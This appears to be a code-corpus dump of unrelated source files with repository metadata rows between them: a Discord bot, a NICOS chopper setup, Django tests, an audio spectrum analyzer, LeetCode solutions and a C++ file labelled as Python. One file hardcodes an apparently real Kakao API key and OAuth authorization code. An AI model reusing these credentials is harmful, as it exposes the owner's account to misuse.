@commands.cooldown(1, 6, commands.BucketType.user)
async def remindlist(self, ctx):
"""Post your current list of reminders"""
id = str(ctx.author.id)
if id not in self.bot.reminders or len(self.bot.reminders[id]) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="You don't have any reminders", color=self.color))
else:
embed = discord.Embed(title="{}'s Reminder List".format(ctx.author.display_name), color=random.randint(0, 16777216)) # random color
embed.set_thumbnail(url=ctx.author.avatar_url)
for i in range(0, len(self.bot.reminders[id])):
embed.add_field(name="#{} ▫️ {:%Y/%m/%d %H:%M} JST".format(i, self.bot.reminders[id][i][0]), value=self.bot.reminders[id][i][1], inline=False)
await ctx.send(embed=embed)
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['rd', 'reminderdel'])
@commands.cooldown(2, 3, commands.BucketType.user)
async def reminddel(self, ctx, rid : int):
"""Delete one of your reminders"""
id = str(ctx.author.id)
if id not in self.bot.reminders or len(self.bot.reminders[id]) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="You don't have any reminders", color=self.color))
else:
if rid < 0 or rid >= len(self.bot.reminders[id]):
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Invalid id `{}`".format(rid), color=self.color))
else:
self.bot.reminders[id].pop(rid)
if len(self.bot.reminders[id]) == 0:
self.bot.reminders.pop(id)
self.bot.savePending = True
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
@commands.cooldown(1, 1, commands.BucketType.user)
async def iam(self, ctx, *, role_name : str):
"""Add a role to you that you choose. Role must be on a list of self-assignable roles."""
g = str(ctx.guild.id)
roles = self.bot.assignablerole.get(g, {})
if role_name.lower() not in roles:
await ctx.message.add_reaction('❎') # negative check mark
else:
id = roles[role_name.lower()]
r = ctx.guild.get_role(id)
if r is None: # role doesn't exist anymore
await ctx.message.add_reaction('❎') # negative check mark
self.bot.assignablerole[g].pop(role_name.lower())
if len(self.bot.assignablerole[g]) == 0:
self.bot.assignablerole.pop(g)
self.bot.savePending = True
else:
try:
await ctx.author.add_roles(r)
except:
pass
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['iamn'])
@isAuthorized()
@commands.cooldown(1, 1, commands.BucketType.user)
async def iamnot(self, ctx, *, role_name : str):
"""Remove a role to you that you choose. Role must be on a list of self-assignable roles."""
g = str(ctx.guild.id)
roles = self.bot.assignablerole.get(g, {})
if role_name.lower() not in roles:
await ctx.message.add_reaction('❎') # negative check mark
else:
id = roles[role_name.lower()]
r = ctx.guild.get_role(id)
if r is None: # role doesn't exist anymore
await ctx.message.add_reaction('❎') # negative check mark
self.bot.assignablerole[g].pop(role_name.lower())
if len(self.bot.assignablerole[g]) == 0:
self.bot.assignablerole.pop(g)
self.bot.savePending = True
else:
try:
await ctx.author.remove_roles(r)
except:
pass
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
@commands.cooldown(1, 5, commands.BucketType.guild)
async def lsar(self, ctx, page : int = 1):
"""List the self-assignable roles available in this server"""
g = str(ctx.guild.id)
if page < 1: page = 1
roles = self.bot.assignablerole.get(str(ctx.guild.id), {})
if len(roles) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Error", description="No self assignable roles available on this server", color=self.color))
return
if (page -1) >= len(roles) // 20:
page = ((len(roles) - 1) // 20) + 1
fields = []
count = 0
for k in list(roles.keys()):
if count < (page - 1) * 20:
count += 1
continue
if count >= page * 20:
break
if count % 10 == 0:
fields.append({'name':'{} '.format(self.bot.getEmote(str(len(fields)+1))), 'value':'', 'inline':True})
r = ctx.guild.get_role(roles[k])
if r is not None:
fields[-1]['value'] += '{}\n'.format(k)
else:
self.bot.assignablerole[str(ctx.guild.id)].pop(k)
self.bot.savePending = True
count += 1
await ctx.send(embed=self.bot.buildEmbed(title="Self Assignable Roles", fields=fields, footer="Page {}/{}".format(page, 1+len(roles)//20), color=self.color)) | 48.701923 | 226 | 0.536387 | 3,005 | 25,325 | 4.496506 | 0.148419 | 0.042481 | 0.026939 | 0.033156 | 0.499556 | 0.425844 | 0.406306 | 0.385509 | 0.360938 | 0.31831 | 0 | 0.016099 | 0.320592 | 25,325 | 520 | 227 | 48.701923 | 0.767814 | 0.019151 | 0 | 0.35307 | 0 | 0 | 0.107546 | 0.001611 | 0 | 0 | 0.000348 | 0 | 0 | 0 | null | null | 0.006579 | 0.017544 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57cf71e94609fd85e48613dd288c7fef9e5aa2fe | 2,260 | py | Python | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Some kind of SKF chopper'
pv_root = 'LabS-Embla:Chop-Drv-0601:'
devices = dict(
skf_drive_temp=device('nicos.devices.epics.pva.EpicsReadable',
description='Drive temperature',
readpv='{}DrvTmp_Stat'.format(pv_root),
monitor=True,
),
skf_motor_temp=device('nicos.devices.epics.pva.EpicsReadable',
description='Motor temperature',
readpv='{}MtrTmp_Stat'.format(pv_root),
monitor=True,
),
skf_pos_v13=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosV13_Stat'.format(pv_root),
monitor=True,
),
skf_pos_v24=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosV24_Stat'.format(pv_root),
monitor=True,
),
skf_pos_w13=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosW13_Stat'.format(pv_root),
monitor=True,
),
skf_pos_w24=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosW24_Stat'.format(pv_root),
monitor=True,
),
skf_pos_Z12=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosZ12_Stat'.format(pv_root),
monitor=True,
),
skf_status=device('nicos.devices.epics.pva.EpicsStringReadable',
description='The chopper status.',
readpv='{}Chop_Stat'.format(pv_root),
monitor=True,
),
skf_control=device('nicos.devices.epics.pva.EpicsMappedMoveable',
description='Used to start and stop the chopper.',
readpv='{}Cmd'.format(pv_root),
writepv='{}Cmd'.format(pv_root),
requires={'level': 'user'},
mapping={'Clear chopper': 8,
'Start chopper': 6,
'Async start': 5,
'Stop chopper': 3,
'Reset chopper': 1,
},
),
skf_speed=device('nicos.devices.epics.pva.EpicsAnalogMoveable',
description='The current speed.',
requires={'level': 'user'},
readpv='{}Spd_Stat'.format(pv_root),
writepv='{}Spd_SP'.format(pv_root),
abslimits=(0.0, 77),
monitor=True,
),
)
# === chapter_08/05_alphabetic_tel_number.py | SergeHall/Tony-Gaddis-Python-4th (MIT) ===

# 5. Alphabetic telephone number translator. Many companies use telephone
# numbers such as 555-GET-FOOD so that the numbers are easier for customers
# to remember. On a standard telephone the letters of the alphabet are mapped
# to digits as follows: A, B and C = 2; D, E and F = 3; and so on.
# Prompt format: nnn-XXX-XXXX, where n is a digit and X is a letter.
def main():
    print("'x' can be either a letter or a number.")
    phone_num = input('Enter a phone number in the format xxx-xxx-xxxx: ')
    print("Phone number alphabet:", phone_num)
    print("Phone number: ", end="")
    print_number_alphabet(phone_num)


def print_number_alphabet(num_phone):
    # Standard keypad groups: ABC=2, DEF=3, GHI=4, JKL=5, MNO=6,
    # PQRS=7, TUV=8, WXYZ=9.
    for ch in num_phone:
        ch = ch.upper()
        if ch.isdigit() or ch == '-':
            print(ch, end='')
        elif ch in 'ABC':
            print('2', end='')
        elif ch in 'DEF':
            print('3', end='')
        elif ch in 'GHI':
            print('4', end='')
        elif ch in 'JKL':
            print('5', end='')
        elif ch in 'MNO':
            print('6', end='')
        elif ch in 'PQRS':
            print('7', end='')
        elif ch in 'TUV':
            print('8', end='')
        elif ch in 'WXYZ':
            print('9', end='')
        else:
            print('-', end='')
    print()


if __name__ == '__main__':
    main()
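For comparison, the same standard keypad mapping can be built once as a translation table instead of an elif chain. This is a hypothetical alternative sketch, not part of the textbook exercise; `KEYPAD` and `to_digits` are made-up names.

```python
# Hypothetical alternative: one translation table instead of an elif chain.
# KEYPAD and to_digits are made-up names for this sketch.
KEYPAD = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "22233344455566677778889999",
)

def to_digits(phone):
    """Translate any letters in a phone number to their keypad digits."""
    return phone.upper().translate(KEYPAD)

print(to_digits("555-GET-FOOD"))  # 555-438-3663
```

`str.translate` leaves digits and dashes untouched, so no per-character branching is needed.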
# === carton/tests/urls.py | knyazz/py3-django-enriched-carton (MIT) ===

from django.conf.urls import url
from .views import (
add,
clear,
remove,
remove_single,
set_quantity,
show
)
urlpatterns = [
url(r'^show/$', show, name='carton-tests-show'),
url(r'^add/$', add, name='carton-tests-add'),
url(r'^remove/$', remove, name='carton-tests-remove'),
url(r'^remove-single/$', remove_single, name='carton-tests-remove-single'),
url(r'^clear/$', clear, name='carton-tests-clear'),
url(r'^set-quantity/$', set_quantity, name='carton-tests-set-quantity'),
]
# === spectrumanalyzer.py | cwolfe007/LEDSoundResponsiveSuit (MIT) ===
# Spectrum Analyzer Code Author: Caleb Wolfe
import time
import Adafruit_GPIO.SPI as SPI
import Adafruit_MCP3008
import numpy as np
class SpectrumAnalyzer:
def __init__(self,smprate=44100,senistivity=100.0,samplesize=1024):
self.__samplerate =smprate
self.__peaksample = senistivity
self.__samplesArraySize = samplesize #sample size for the audio batch to be analyzed
self.__buckets = []
# Hardware SPI configuration:
SPI_PORT = 0
SPI_DEVICE = 0
spid = SPI.SpiDev(SPI_PORT, SPI_DEVICE)
spid.set_clock_hz(self.__samplerate)
self.__mcp = Adafruit_MCP3008.MCP3008(spi=spid)
def __calculate_levels(self,inputarray):
darray = np.array(inputarray, dtype='float')
fourier=np.fft.rfft(darray) #apply discrete FFT
fftusable= fourier[:self.__samplesArraySize-1] #Remove items past Nyquist limit
power = np.abs(fftusable) #convert the complex numbers to real numbers
nyqquistadjustment= (power*2)/ (1024*self.__samplesArraySize) #Adjust the values to find actual amplitude (1024 is the max range of voltage)
result = nyqquistadjustment
self.__fft = result
def __readmicval(self):
value = self.__mcp.read_adc(0)
return value
def __getvals(self):
subbassbucket = []
bassbucketlow = []
bassbuckethigh = []
lowmid1bucket = []
lowmid2bucket = []
lowmid3bucket = []
lowmid4bucket = []
mid1bucket = []
mid2bucket = []
mid3bucket = []
mid4bucket = []
midbuckethigh = []
highbucketlow = []
highbuckethigh = []
amps = []
currentpos = 0
        # Find the amplitude values belonging to each bucket.
        for a in self.__fft:  # append amplitudes to buckets
            amp = a * 10000  # make values more manageable (lower decibel setting; 10000 chosen while experimenting with quieter dB levels)
            frq = self.__freqarray[currentpos]  # get the current frequency
            if amp > self.__peaksample:  # apply the sensitivity level so insignificant amplitudes are ignored
if (frq > 20 and frq < 60): # and p in range(0,3) :
amp = (amp+50)%256
subbassbucket.append(amp)
elif (frq >= 60 and frq < 155): # and p in range(3,5):
bassbucketlow.append(amp)
elif (frq >= 155 and frq < 250):
bassbuckethigh.append(amp)
elif (frq >= 250 and frq < 313):
lowmid1bucket.append(amp)
elif (frq >= 313 and frq < 376): # and p in range(5,9):
lowmid2bucket.append(amp)
elif (frq >= 376 and frq < 439): # and p in range(5,9):
lowmid3bucket.append(amp)
elif (frq >= 439 and frq < 500): # and p in range(5,9):
lowmid4bucket.append(amp)
elif (frq >= 500 and frq < 875):
mid1bucket.append(amp)
elif frq >= 875 and frq < 1250:
mid2bucket.append(amp)
elif (frq >= 1250 and frq < 1625): # and p in range(9,12):
mid3bucket.append(amp)
elif (frq >= 1625 and frq < 2000): # and p in range(9,12):
mid4bucket.append(amp)
elif (frq >= 2000 and frq < 3000): #and p in range(12,15):
highbucketlow.append(amp)
elif (frq >= 3000 and frq < 4000): #and p in range(12,15):
highbuckethigh.append(amp)
currentpos += 1
self.__buckets = [np.mean(subbassbucket),np.mean(bassbucketlow),np.mean(bassbuckethigh),np.mean(lowmid1bucket),np.mean(lowmid2bucket),np.mean(lowmid3bucket),np.mean(lowmid4bucket),np.mean(mid1bucket),np.mean(mid2bucket),np.mean(mid3bucket),np.mean(mid4bucket),np.mean(highbucketlow),np.mean(highbuckethigh) ]
def getSpectrumBuckets(self):
return self.__buckets
def analyzeSpectrum(self):
tic = time.clock()
data = [self.__readmicval() for x in range(self.__samplesArraySize)]
toc = time.clock()
        self.__calculate_levels(data)  # stores the amplitude spectrum in self.__fft
processtime = toc-tic
stimestep = processtime /self.__samplesArraySize #average step time
self.__freqarray = np.fft.fftfreq(self.__samplesArraySize,stimestep) #get freq steps
self.__getvals()
print('Reading MCP3008 values, press Ctrl-C to quit...')
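The amplitude scaling used in `__calculate_levels` can be checked in isolation. The sketch below (function name and parameters are made up for illustration) applies the same single-sided rFFT scaling to a synthetic tone and recovers its amplitude relative to the 10-bit ADC range.

```python
import numpy as np

def amplitude_spectrum(samples, adc_range=1024):
    # Same idea as __calculate_levels: magnitudes up to Nyquist, scaled by
    # 2 / (adc_range * N) to estimate real amplitudes in ADC-range units.
    n = len(samples)
    return np.abs(np.fft.rfft(samples)) * 2 / (adc_range * n)

# A 50 Hz tone sampled at 1 kHz for 1 s peaks in FFT bin 50 (1 Hz per bin).
fs = 1000
t = np.arange(fs) / fs
tone = 100 * np.sin(2 * np.pi * 50 * t)   # amplitude 100 ADC counts
spec = amplitude_spectrum(tone)
peak_bin = int(np.argmax(spec))
```

The recovered peak value is 100/1024, i.e. the tone amplitude as a fraction of the ADC range, matching the scaling comment in the class above.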
# === accounts/tests/test_views.py | jhonatanlteodoro/ecommerce-django (MIT) ===

from django.test import Client
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from model_mommy import mommy
from django.conf import settings
User = get_user_model()
class RegisterViewTestCase(TestCase):
def setUp(self):
self.client = Client()
self.register_url = reverse('accounts:register')
def test_register_ok(self):
data = {
'username': 'jhowuserteste', 'email': 'uhuuu@gmail.com',
'password1': 'teste123','password2': 'teste123',
}
response = self.client.post(self.register_url, data)
login_url = reverse('login')
self.assertRedirects(response, login_url)
self.assertEquals(User.objects.count(), 1)
def test_register_fail(self):
data = {
'username': 'jhowuserteste', 'password1': 'teste123',
'password2': 'teste123',
}
response = self.client.post(self.register_url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdateUserTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_user')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('123')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_user_ok(self):
data = {'name': 'humbree', 'email':'jovem@gmail.com'}
response = self.client.get(self.url)
self.assertEquals(response.status_code, 302)
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
accounst_index_url = reverse('accounts:index')
self.assertRedirects(response, accounst_index_url)
#user = User.objects.get(username=self.user.username)
self.user.refresh_from_db()
self.assertEquals(self.user.email, 'jovem@gmail.com')
self.assertEquals(self.user.name, 'humbree')
def test_update_user_error(self):
data = {}
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdatePasswordTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_password')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('123')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_password_ok(self):
data = {
'old_password': '123', 'new_password1':'teste1234',
'new_password2':'teste1234',
}
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
self.user.refresh_from_db()
#user = User.objects.get(username=self.user.username)
self.assertTrue(self.user.check_password('teste1234'))
# === lattice_gauge_theory/cluster.py | saforem2/lattice_gauge_theory (MIT) ===

class Cluster(object):
""" Object for grouping sets of sites. """
def __init__(self, sites):
"""
Initialize a cluster instance.
Args:
sites (list(Site)): The list of sites that make up the cluster.
Returns:
None
"""
self.sites = set(sites)
self.neighbors = set()
for s in self.sites:
self.neighbors.update(s.p_neighbors)
self.neighbors = self.neighbors.difference(self.sites)
def merge(self, other_cluster):
"""
Combine two clusters into a single cluster.
Args:
other_cluster (Cluster): The second cluster to combine.
Returns:
(Cluster): The combination of both clusters.
"""
        new_cluster = Cluster(self.sites | other_cluster.sites)
        new_cluster.neighbors = (
            self.neighbors | other_cluster.neighbors
        ).difference(new_cluster.sites)
        return new_cluster
def is_neighboring(self, other_cluster):
"""
Logical check whether the neighbor list for cluster A includes any site
in cluster B
Args:
other_cluster (Cluster): The other cluster we are testing for
neighbor connectivity.
Returns:
bool: True if the other cluster neighbors this cluster.
"""
return bool(self.neighbors & other_cluster.sites)
    def size(self):
        """
        Number of sites in this cluster.

        Args:
            None

        Returns:
            (int): The number of sites.
        """
        return len(self.sites)
def sites_at_edges(self):
"""
Finds the six sites with the max and min coordinates along x, y, and z.
Args:
None
Returns:
list(list): In the order [+x, -x, +y, -y, +z, -z]
"""
min_x = min([s.r[0] for s in self.sites])
max_x = max([s.r[0] for s in self.sites])
min_y = min([s.r[1] for s in self.sites])
max_y = max([s.r[1] for s in self.sites])
min_z = min([s.r[2] for s in self.sites])
max_z = max([s.r[2] for s in self.sites])
        x_max = [s for s in self.sites if s.r[0] == max_x]
        x_min = [s for s in self.sites if s.r[0] == min_x]
        y_max = [s for s in self.sites if s.r[1] == max_y]
        y_min = [s for s in self.sites if s.r[1] == min_y]
        z_max = [s for s in self.sites if s.r[2] == max_z]
        z_min = [s for s in self.sites if s.r[2] == min_z]
        return (x_max, x_min, y_max, y_min, z_max, z_min)
def is_periodically_contiguous(self):
"""
Logical check whether a cluster connects with itself across the
periodic boundary.
Args:
None
Returns:
(bool, bool, bool): Contiguity along the x, y, and z coordinates.
"""
edges = self.sites_at_edges()
is_contiguous = [False, False, False]
along_x = any(
[s2 in s1.p_neighbors for s1 in edges[0] for s2 in edges[1]]
)
along_y = any(
[s2 in s1.p_neighbors for s1 in edges[2] for s2 in edges[3]]
)
along_z = any(
[s2 in s1.p_neighbors for s1 in edges[4] for s2 in edges[5]]
)
return (along_x, along_y, along_z)
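The neighbor-set bookkeeping that `__init__` and `merge` perform can be illustrated on plain sets, independent of the Site class; the adjacency dict and helper below are made up for this sketch.

```python
def cluster_neighbors(sites, adjacency):
    # A cluster's neighbor set is the union of its sites' neighbors,
    # minus the sites already in the cluster -- mirroring __init__/merge.
    nbrs = set()
    for s in sites:
        nbrs |= adjacency[s]
    return nbrs - sites

# Three sites in a line: 1 - 2 - 3.
adjacency = {1: {2}, 2: {1, 3}, 3: {2}}
left = {1}
merged = left | {2}          # merging clusters {1} and {2}
```

After the merge, site 2 is no longer a neighbor (it is inside the cluster) and site 3 becomes one, which is exactly what `merge` computes with `difference`.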
# === icbd/type_analyzer/tests/parametric.py | kmod/icbd (MIT) ===

import collections
def unknown():
raise Exception()
l = [1] # 0 [<int|str>]
l.append(2) # 0 [<int|str>] # 2 (<int|str>) -> None
l.append('')
l[0] = 1
l[0] = ""
l2 = list(l) # 0 [<int|str>]
l2 = sorted(l) # 0 [<int|str>]
x = collections.deque(l2).pop() # 0 <int|str>
l2 = reversed(l) # 0 iterator of <int|str>
l2 = {1:l}[1] # 0 [<int|str>]
l2 = {'':l}[1] # 0 [<int|str>] # e 5
l2 = (l, l)[0] # 0 [<int|str>]
l = range(5)
l2 = list(l) # 0 [int]
l2 = sorted(l) # 0 [int]
x = collections.deque(l2).pop() # 0 int
l2 = reversed(l) # 0 iterator of int
l2 = {1:l}[1] # 0 [int]
l2 = {'':l}[1] # 0 [int] # e 5
l2 = (l, l)[0] # 0 [int]
d = dict([(1,2), (3,4)]) # 0 {int:int}
d = dict([]) # 0 {<unknown>:<unknown>}
d = dict([1]) # 0 <unknown> # e 4
d = dict(1) # 0 <unknown> # e 4
d = dict(unknown()) # 0 {<unknown>:<unknown>}
d = dict({1:''}) # 0 {int:str}
d = dict(a=1) # 0 {str:int}
l = range(3) # 0 [<int|object>]
l.extend([object()])
s = set() # 0 set(int)
s.add(2) # 0 set(int) # 2 (int) -> None
s = set() # 0 set(<unknown>)
s = set(2) # e 4 # 0 set(<unknown>)
s = set('') # 0 set(str)
l = []
l[''] = 1 # e 0
def f(x): # 4 (int) -> str
return ''*x
l1 = range(2) # 0 [int]
l2 = map(f, l1) # 0 [str]
s1 = "abc123" # 0 str
# filter special cases strings...
s2 = filter(str.isalpha, s1) # 0 str
s3 = ''.join(s2) # 0 str
s4 = filter(str.isalpha, [s1]) # 0 [str]
d = {1:2} # 0 {int:int}
d2 = d.copy() # 0 {<int|str>:<bool|int>}
d2[''] = True # 0 {<int|str>:<bool|int>}
d = {1:''} # 0 {int:str}
t = d.popitem() # 0 (int,str)
d.clear()
d = {1:2} # 0 {int:<int|str>}
x = d.setdefault(2, '') # 0 <int|str>
d = {1:2} # 0 {int:int}
x = d.get(2, '') # 0 <int|str>
s = set([1,2]) # 0 set(int)
s2 = s.difference(['']) # 0 set(int)
s = set([1,2]) # 0 set(int)
s2 = s.difference_update(['']) # 0 None
s = set([1, 2])
x = s.pop() # 0 int
s.remove('') # e 0
s.remove(0)
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference_update(l) # 0 None
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.union(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.update(l) # 0 None
t1 = (1,) # 0 (int,)
t2 = ('',) # 0 (str,)
t3 = t1 + t2 # 0 (int,str)
s = set([''])
s.issubset([1]) # e 0
s.issuperset([1]) # e 0
s = set(['', 1])
s.issubset([1]) # e 0
s.issuperset([1])
s = set([1])
s.issubset([1, ''])
s.issuperset([1, '']) # e 0
def f9():
r = range(5) # 4 [int]
f = map(float, r) # 4 [float]
m = max(f) # 4 float
def f(x, y): # 8 (str,int) -> [str]
return [x] * y
l = map(f, "aoeu", range(4)) # 4 [[str]]
def f10():
def is_divisible(x, k): # 8 (int,int) -> bool
return (x%k) == 0
l = filter(lambda x:is_divisible(x, 3), range(100)) # 4 [int]
l2 = filter(None, range(10)) # 4 [int]
print l2
l3 = filter(None, "") # 4 str
l4 = filter(None, [""]) # 4 [str]
if 1:
l = ''
else:
l = [1]
l5 = filter(None, l) # 4 <[int]|str> # 22 <[int]|str>
# === kakao_message_utils/request_token.py | hahagarden/project_news_summarize (MIT) ===

import token_def
# To get Authorization Code
# https://kauth.kakao.com/oauth/authorize?client_id=cc335daa766cc74b3de1b1c372a6cce8&response_type=code&redirect_uri=https://localhost.com
KAKAO_APP_KEY = "cc335daa766cc74b3de1b1c372a6cce8" # REST_API app key
AUTHORIZATION_CODE = "flzXSvhelQ3LLzmAKyo5-bQsafEyGOyFAMyK4N-dTii5B-SxG3-KimikA5vq0zD1ChZ_jQo9dVsAAAF8OjRb-g" # once in a run
KAKAO_TOKEN_FILENAME = "/Users/jeongwon/Documents/GitHub/project_news_summarize/json/kakao_token.json" # Token in this file(.json)
# To get Access Token
tokens = token_def.request_tokens(KAKAO_APP_KEY, AUTHORIZATION_CODE)
# To save Access Token in the file(.json)
token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
# # To update Refresh Token after the Access Token is expired
# tokens=token_def.update_tokens(KAKAO_APP_KEY, KAKAO_TOKEN_FILENAME)
# token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
# === test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon (MIT) ===

from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon import constants
from bxcommon.messages.bloxroute.abstract_bloxroute_message import AbstractBloxrouteMessage
from bxcommon.messages.bloxroute.bloxroute_message_control_flags import BloxrouteMessageControlFlags
class TestAbstractBloxrouteMessage(AbstractTestCase):
    def test_abstract_bloxroute_message(self):
total_msg_len = 1000
msg_type = b"dummy_msg"
payload_len = total_msg_len - constants.BX_HDR_COMMON_OFF - constants.STARTING_SEQUENCE_BYTES_LEN
buffer = bytearray(total_msg_len)
message = AbstractBloxrouteMessage(msg_type=msg_type, payload_len=payload_len, buf=buffer)
raw_bytes = message.rawbytes()
self.assertEqual(total_msg_len, len(raw_bytes))
self.assertEqual(msg_type, message.msg_type())
self.assertEqual(payload_len, message.payload_len())
self.assertEqual(payload_len, len(message.payload()))
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.remove_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertFalse(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
# Trying set already set flag
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
# === LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice (Apache-2.0) ===

class Solution:
# @param {integer} k
# @param {integer} n
# @return {integer[][]}
def combinationSum3(self, k, n):
nums = range(1, 10)
self.results = []
self.combination(nums, n, k, 0, [])
return self.results
def combination(self, nums, target, k, start, result):
if k <= 0 :
return
elif k == 1:
for i in nums:
if i == target:
self.results.append([i])
elif k == 2:
end = len(nums) - 1
while start < end:
s = nums[start] + nums[end]
if s == target:
result.append(nums[start])
result.append(nums[end])
self.results.append(result[:])
result.pop()
result.pop()
start += 1
elif s < target:
start += 1
else:
#s > target
end -= 1
else:
for i in range(start, len(nums)-1):
t = target - nums[i]
if t >= nums[i+1]:
result.append(nums[i])
self.combination(nums, t, k -1, i + 1, result )
result.pop()
else:
break | 28.3125 | 67 | 0.382634 | 137 | 1,359 | 3.79562 | 0.255474 | 0.084615 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.505519 | 1,359 | 48 | 68 | 28.3125 | 0.75 | 0.050773 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
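As a cross-check of the problem's semantics (k distinct digits from 1 to 9 summing to n), a brute-force version with `itertools` produces the same answer sets. This sketch is not part of the original solution above.

```python
from itertools import combinations

def combination_sum3_bruteforce(k, n):
    # Enumerate all k-digit combinations of 1..9, keep those summing to n.
    return [list(c) for c in combinations(range(1, 10), k) if sum(c) == n]

print(combination_sum3_bruteforce(3, 9))  # [[1, 2, 6], [1, 3, 5], [2, 3, 4]]
```

`combinations` already yields strictly increasing tuples, so distinctness and ordering come for free.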
17c5738139be0ff3cd10e6b345ccee28c0202628 | 752 | py | Python | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | class Solution {
public:
bool leadsToDestination(int n, vector<vector<int>>& edges, int source, int destination) {
for(auto & edge : edges) {
int u = edge[0], v = edge[1];
graph[u].push_back(v);
}
vector<bool> visited(n, false);
return dfs(source, destination, visited);
}
private:
bool dfs(int node, int target, vector<bool> & visited) {
if (graph.find(node) == graph.end()) return node == target;
visited[node] = true;
for (int nei : graph[node]) {
if (visited[nei] || !dfs(nei, target, visited))
return false;
}
visited[node] = false;
return true;
}
unordered_map<int, vector<int>> graph;
};
